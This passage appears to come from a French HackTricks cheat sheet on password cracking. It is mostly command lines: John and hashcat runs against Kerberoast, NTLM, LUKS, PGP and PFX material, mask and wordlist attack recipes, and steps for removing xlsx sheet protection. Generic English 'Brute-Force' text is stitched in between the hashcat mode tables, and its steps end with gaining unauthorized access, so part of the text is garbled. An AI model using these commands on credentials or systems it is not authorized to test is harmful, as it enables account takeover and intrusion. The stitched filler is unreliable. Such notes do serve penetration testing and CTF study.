john --format=krb5tgs --wordlist=passwords_kerb.txt hashes.kerberoast
hashcat -m 13100 --force -a 0 hashes.kerberoast passwords_kerb.txt
./tgsrepcrack.py wordlist.txt 1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbi

Image Lucks

Méthode 1

Installer : https://github.com/glv2/bruteforce-luks

bruteforce-luks -f ./list.txt ./backup.img
cryptsetup luksOpen backup.img mylucksopen
ls /dev/mapper/ #You should find here the image mylucksopen
mount /dev/mapper/mylucksopen /mnt

Méthode 2

cryptsetup luksDump backup.img #Check that the payload offset is set to 4096
dd if=backup.img of=luckshash bs=512 count=4097 #Payload offset +1
hashcat -m 14600 -a 0 luckshash  wordlists/rockyou.txt
cryptsetup luksOpen backup.img mylucksopen
ls /dev/mapper/ #You should find here the image mylucksopen
mount /dev/mapper/mylucksopen /mnt

Mysql

Un autre tutoriel Luks BF : http://blog.dclabs.com.br/2020/03/bruteforcing-linux-disk-encription-luks.html?m=1

#John hash format
<USERNAME>:$mysqlna$<CHALLENGE>*<RESPONSE>
dbuser:$mysqlna$112233445566778899aabbccddeeff1122334455*73def07da6fba5dcc1b19c918dbd998e0d1f3f9d

Clé privée PGP/GPG

gpg2john private_pgp.key #This will generate the hash and save it in a file
john --wordlist=/usr/share/wordlists/rockyou.txt ./hash

Cisco

Clé maître DPAPI

Utilisez https://github.com/openwall/john/blob/bleeding-jumbo/run/DPAPImk2john.py puis john

Colonne protégée par mot de passe dans Open Office

Si vous avez un fichier xlsx avec une colonne protégée par un mot de passe, vous pouvez la déprotéger :

  • Téléchargez-le sur Google Drive et le mot de passe sera automatiquement supprimé
  • Pour le supprimer manuellement :
unzip file.xlsx
grep -R "sheetProtection" ./*
# Find something like: <sheetProtection algorithmName="SHA-512"
hashValue="hFq32ZstMEekuneGzHEfxeBZh3hnmO9nvv8qVHV8Ux+t+39/22E3pfr8aSuXISfrRV9UVfNEzidgv+Uvf8C5Tg" saltValue="U9oZfaVCkz5jWdhs9AA8nA" spinCount="100000" sheet="1" objects="1" scenarios="1"/>
# Remove that line and rezip the file
zip -r file.xls .

Certificats PFX

# From https://github.com/Ridter/p12tool
./p12tool crack -c staff.pfx -f /usr/share/wordlists/rockyou.txt
# From https://github.com/crackpkcs12/crackpkcs12
crackpkcs12 -d /usr/share/wordlists/rockyou.txt ./cert.pfx


Utilisez Trickest pour construire facilement et automatiser des workflows alimentés par les outils communautaires les plus avancés au monde.
Accédez dès aujourd'hui :

{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}

Outils

Exemples de hash : https://openwall.info/wiki/john/sample-hashes

Identification de hash

hash-identifier
> <HASH>

Listes de mots

Outils de génération de listes de mots

  • kwprocessor: Générateur avancé de séquences de touches avec des caractères de base configurables, une disposition de touches et des itinéraires.
kwp64.exe basechars\custom.base keymaps\uk.keymap routes\2-to-10-max-3-direction-changes.route -o D:\Tools\keywalk.txt

Mutation de John

Lisez /etc/john/john.conf et configurez-le

john --wordlist=words.txt --rules --stdout > w_mutated.txt
john --wordlist=words.txt --rules=all --stdout > w_mutated.txt #Apply all rules

Hashcat

Attaques Hashcat

  • Attaque par liste de mots (-a 0) avec des règles

Hashcat est déjà livré avec un dossier contenant des règles mais vous pouvez trouver d'autres règles intéressantes ici.

hashcat.exe -a 0 -m 1000 C:\Temp\ntlm.txt .\rockyou.txt -r rules\best64.rule
  • Attaque de combinaison de listes de mots

Il est possible de combiner 2 listes de mots en 1 avec hashcat.
Si la liste 1 contenait le mot "hello" et que la seconde contenait 2 lignes avec les mots "world" et "earth". Les mots helloworld et helloearth seront générés.

# This will combine 2 wordlists
hashcat.exe -a 1 -m 1000 C:\Temp\ntlm.txt .\wordlist1.txt .\wordlist2.txt

# Same attack as before but adding chars in the newly generated words
# In the previous example this will generate:
## hello-world!
## hello-earth!
hashcat.exe -a 1 -m 1000 C:\Temp\ntlm.txt .\wordlist1.txt .\wordlist2.txt -j $- -k $!
  • Attaque par masque (-a 3)
# Mask attack with simple mask
hashcat.exe -a 3 -m 1000 C:\Temp\ntlm.txt ?u?l?l?l?l?l?l?l?d

hashcat --help #will show the charsets and are as follows
? | Charset
===+=========
l | abcdefghijklmnopqrstuvwxyz
u | ABCDEFGHIJKLMNOPQRSTUVWXYZ
d | 0123456789
h | 0123456789abcdef
H | 0123456789ABCDEF
s | !"#$%&'()*+,-./:;<=>?@[\]^_`{|}~
a | ?l?u?d?s
b | 0x00 - 0xff

# Mask attack declaring custom charset
hashcat.exe -a 3 -m 1000 C:\Temp\ntlm.txt -1 ?d?s ?u?l?l?l?l?l?l?l?1
## -1 ?d?s defines a custom charset (digits and specials).
## ?u?l?l?l?l?l?l?l?1 is the mask, where "?1" is the custom charset.

# Mask attack with variable password length
## Create a file called masks.hcmask with this content:
?d?s,?u?l?l?l?l?1
?d?s,?u?l?l?l?l?l?1
?d?s,?u?l?l?l?l?l?l?1
?d?s,?u?l?l?l?l?l?l?l?1
?d?s,?u?l?l?l?l?l?l?l?l?1
## Use it to crack the password
hashcat.exe -a 3 -m 1000 C:\Temp\ntlm.txt .\masks.hcmask
  • Attaque Wordlist + Masque (-a 6) / Masque + Wordlist (-a 7)
# Mask numbers will be appended to each word in the wordlist
hashcat.exe -a 6 -m 1000 C:\Temp\ntlm.txt \wordlist.txt ?d?d?d?d

# Mask numbers will be prepended to each word in the wordlist
hashcat.exe -a 7 -m 1000 C:\Temp\ntlm.txt ?d?d?d?d \wordlist.txt

Modes Hashcat

hashcat --example-hashes | grep -B1 -A2 "NTLM"

Brute Force

Description

Brute force is a common technique used to crack passwords by systematically trying all possible combinations of characters until the correct one is found. This method is often used to crack Linux hashes stored in the /etc/shadow file.

Tools

  • John the Ripper: A popular password cracking tool that can be used for brute force attacks.
  • Hashcat: Another powerful tool for cracking passwords using brute force and other techniques.

Methodology

  1. Obtain the hash from the /etc/shadow file.
  2. Use a password cracking tool like John the Ripper or Hashcat to perform a brute force attack.
  3. Configure the tool to try different combinations of characters, such as letters, numbers, and symbols.
  4. Monitor the progress of the brute force attack and wait for the correct password to be found.
  5. Once the password is cracked, it can be used to gain unauthorized access to the system.

Prevention

  • Use strong, complex passwords that are less susceptible to brute force attacks.
  • Implement multi-factor authentication to add an extra layer of security.
  • Regularly update passwords and monitor for any unauthorized access attempts.
500 | md5crypt $1$, MD5(Unix)                          | Operating-Systems
3200 | bcrypt $2*$, Blowfish(Unix)                      | Operating-Systems
7400 | sha256crypt $5$, SHA256(Unix)                    | Operating-Systems
1800 | sha512crypt $6$, SHA512(Unix)                    | Operating-Systems

Brute-Force

Introduction

Brute-force attacks are a common method used to crack passwords by systematically trying all possible combinations until the correct one is found. This technique can be used to crack Windows hashes by generating potential passwords and comparing their hash values to the target hash.

Tools

There are various tools available for performing brute-force attacks on Windows hashes, such as John the Ripper and Hashcat. These tools support different algorithms and can be customized to optimize the cracking process.

Methodology

  1. Obtain the Windows hash that you want to crack.
  2. Choose a suitable tool for performing the brute-force attack.
  3. Configure the tool with the necessary parameters, such as the hash type and character set.
  4. Start the brute-force attack and wait for the tool to find the correct password.
  5. Once the password is found, use it to gain unauthorized access to the target system.

Conclusion

Brute-force attacks can be an effective way to crack Windows hashes, especially if the passwords are weak or easily guessable. It is important to use strong, complex passwords to protect against these types of attacks.

3000 | LM                                               | Operating-Systems
1000 | NTLM                                             | Operating-Systems

Brute-Force

Introduction

Brute-force attacks are a common method used to crack passwords and hashes. This technique involves trying all possible combinations of characters until the correct one is found. Brute-force attacks can be time-consuming but are often effective.

Tools

There are several tools available for conducting brute-force attacks, such as Hydra, John the Ripper, and Hashcat. These tools can be customized to target specific types of hashes and passwords, making them versatile for different scenarios.

Methodology

  1. Select Target: Identify the target application or system that you want to crack the hash for.

  2. Choose Tool: Select a suitable brute-force tool based on the type of hash or password you are trying to crack.

  3. Configure Tool: Customize the tool settings to match the hash type and complexity of the password.

  4. Initiate Attack: Start the brute-force attack and let the tool run through all possible combinations.

  5. Monitor Progress: Keep an eye on the progress of the attack to see if any valid passwords are found.

  6. Crack Hash: Once the correct password is identified, use it to access the target application or system.

Conclusion

Brute-force attacks can be a powerful method for cracking common application hashes. By using the right tools and following a systematic approach, hackers can successfully uncover passwords and gain unauthorized access to systems.

900 | MD4                                              | Raw Hash
0 | MD5                                              | Raw Hash
5100 | Half MD5                                         | Raw Hash
100 | SHA1                                             | Raw Hash
10800 | SHA-384                                          | Raw Hash
1400 | SHA-256                                          | Raw Hash
1700 | SHA-512                                          | Raw Hash
Apprenez le piratage AWS de zéro à héros avec htARTE (HackTricks AWS Red Team Expert)!

Autres façons de soutenir HackTricks :


Utilisez Trickest pour construire et automatiser facilement des workflows alimentés par les outils communautaires les plus avancés au monde.
Accédez dès aujourd'hui :

{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}